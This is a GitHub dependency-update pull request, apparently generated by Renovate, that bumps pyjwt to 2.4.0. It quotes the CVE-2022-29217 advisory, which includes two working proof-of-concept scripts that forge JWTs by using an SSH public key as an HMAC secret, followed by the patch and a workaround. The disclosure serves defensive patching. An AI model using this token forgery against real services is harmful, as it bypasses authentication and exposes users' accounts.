sarvex / mongo

The Mongo Database
http://www.mongodb.org/
Other
0 stars 0 forks source link

Update dependency pyjwt to <=2.4.0 [SECURITY] - autoclosed #15

Closed renovate[bot] closed 9 months ago

renovate[bot] commented 9 months ago

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
pyjwt <=2.3.0 -> <=2.4.0 age adoption passing confidence

[!WARNING] Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2022-29217

Impact

What kind of vulnerability is it? Who is impacted?

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm.

The PyJWT library requires that the application chooses what algorithms are supported. The application can specify "jwt.algorithms.get_default_algorithms()" to get support for all algorithms. They can also specify a single one of them (which is the usual use case if calling jwt.decode directly. However, if calling jwt.decode in a helper function, all algorithms might be enabled.)

For example, if the user chooses "none" algorithm and the JWT checker supports that, there will be no signature checking. This is a common security issue with some JWT implementations.

PyJWT combats this by requiring that the if the "none" algorithm is used, the key has to be empty. As the key is given by the application running the checker, attacker cannot force "none" cipher to be used.

Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is not a public key meant for asymmetric algorithm i.e. HMAC cannot be used if the key begins with "ssh-rsa". If HMAC is used with a public key, the attacker can just use the publicly known public key to sign the token and the checker would use the same key to verify.

From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. With ed25519, PyJWT supports public keys that start with "ssh-", for example "ssh-ed25519".

import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

# Generate ed25519 private key
private_key = ed25519.Ed25519PrivateKey.generate()

# Get private key bytes as they would be stored in a file
priv_key_bytes = 
private_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, 
encryption_algorithm=serialization.NoEncryption())

# Get public key bytes as they would be stored in a file
pub_key_bytes = 
private_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)

# Making a good jwt token that should work by signing it with the 
private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="EdDSA")

# Using HMAC with the public key to trick the receiver to think that the 
public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, pub_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
     print("POC Successfull")

# Of course the receiver should specify ed25519 algorithm to be used if 
they specify ed25519 public key. However, if other algorithms are used, 
the POC does not work

# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
#

#        invalid_strings = [
#            b"-----BEGIN PUBLIC KEY-----",

#            b"-----BEGIN CERTIFICATE-----",
#            b"-----BEGIN RSA PUBLIC KEY-----",

#            b"ssh-rsa",
#        ]

#
# However, OKPAlgorithm (ed25519) accepts the following in 
jwt/algorithms.py:

#
#                if "-----BEGIN PUBLIC" in str_key:

#                    return load_pem_public_key(key)
#                if "-----BEGIN PRIVATE" in str_key:

#                    return load_pem_private_key(key, password=None)
#                if str_key[0:4] == "ssh-":

#                    return load_ssh_public_key(key)
#

# These should most likely made to match each other to prevent this behavior
import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem

#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub

priv_key_bytes = b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49
AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk
Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END EC PRIVATE KEY-----"""

pub_key_bytes = b"""-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL
Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END PUBLIC KEY-----"""

ssh_key_bytes = b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""

# Making a good jwt token that should work by signing it with the private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="ES256")

# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, ssh_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
    print("POC Successfull")
else:
    print("POC Failed")

The issue is not that big as algorithms=jwt.algorithms.get_default_algorithms() has to be used. However, with quick googling, this seems to be used in some cases at least in some minor projects.

Patches

Users should upgrade to v2.4.0.

Workarounds

Always be explicit with the algorithms that are accepted and expected when decoding.

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:


Release Notes

jpadilla/pyjwt (pyjwt) ### [`v2.4.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v250-httpsgithubcomjpadillapyjwtcompare240250) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/2.3.0...2.4.0) Changed ``` - Skip keys with incompatible alg when loading JWKSet by @​DaGuich in `#​762 `__ - Remove support for python3.6 by @​sirosen in `#​777 `__ - Emit a deprecation warning for unsupported kwargs by @​sirosen in `#​776 `__ - Remove redundant wheel dep from pyproject.toml by @​mgorny in `#​765 `__ - Do not fail when an unusable key occurs by @​DaGuich in `#​762 `__ - Update audience typing by @​JulianMaurin in `#​782 `__ - Improve PyJWKSet error accuracy by @​JulianMaurin in `#​786 `__ - Mypy as pre-commit check + api_jws typing by @​JulianMaurin in `#​787 `__ Fixed ~~~~~ - Adjust expected exceptions in option merging tests for PyPy3 by @​mgorny in `#​763 `__ - Fixes for pyright on strict mode by @​brandon-leapyear in `#​747 `__ - docs: fix simple typo, iinstance -> isinstance by @​timgates42 in `#​774 `__ - Fix typo: priot -> prior by @​jdufresne in `#​780 `__ - Fix for headers disorder issue by @​kadabusha in `#​721 `__ Added ~~~~~ - Add to_jwk static method to ECAlgorithm by @​leonsmith in `#​732 `__ - Expose get_algorithm_by_name as new method by @​sirosen in `#​773 `__ - Add type hints to jwt/help.py and add missing types dependency by @​kkirsche in `#​784 `__ - Add cacheing functionality for JWK set by @​wuhaoyujerry in `#​781 `__ ```

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Mend Renovate. View repository job log here.

github-actions[bot] commented 9 months ago

🦙 MegaLinter status: ❌ ERROR

Descriptor Linter Files Fixed Errors Elapsed time
❌ ACTION actionlint 2 1 0.1s
⚠️ BASH bash-exec 354 109 3.41s
❌ BASH shellcheck 354 4939 88.36s
⚠️ BASH shfmt 354 313 1 1.08s
❌ COPYPASTE jscpd yes 1 2590.7s
❌ CSS stylelint 6 6 1 2.32s
❌ DOCKERFILE hadolint 12 1 0.9s
❌ HTML djlint 38 1 4.48s
❌ HTML htmlhint 38 2392 0.9s
❌ JAVASCRIPT eslint 6139 0 1 57.74s
❌ JAVASCRIPT standard 6139 6115 1 641.74s
❌ JSON eslint-plugin-jsonc 232 0 2 3.78s
❌ JSON jsonlint 232 1 0.49s
❌ JSON npm-package-json-lint yes 1 3.17s
✅ JSON prettier 232 139 0 8.36s
❌ JSON v8r 232 1 182.19s
⚠️ MARKDOWN markdownlint 269 227 986 19.79s
❌ MARKDOWN markdown-link-check 269 19 18.73s
✅ MARKDOWN markdown-table-formatter 269 229 0 1.82s
❌ PROTOBUF protolint 162 103 3 135.96s
❌ REPOSITORY checkov yes 66 237.19s
❌ REPOSITORY gitleaks yes 327 806.59s
❌ REPOSITORY git_diff yes 1 4.1s
❌ REPOSITORY grype yes 1 16.24s
❌ REPOSITORY secretlint yes 1 10207.21s
❌ REPOSITORY trivy yes 1 10.38s
✅ REPOSITORY trivy-sbom yes no 2.84s
✅ REPOSITORY trufflehog yes no 243.91s
❌ SPELL cspell 40760 1122987 18406.35s
❌ SPELL lychee 5676 1 7.81s
✅ SQL sql-lint 1 0 0.76s
✅ XML xmllint 41 0 0 0.66s
⚠️ YAML prettier 662 512 1 36.1s
❌ YAML v8r 662 1 308.26s
❌ YAML yamllint 662 1 26.45s

See detailed report in MegaLinter reports

_MegaLinter is graciously provided by OX Security_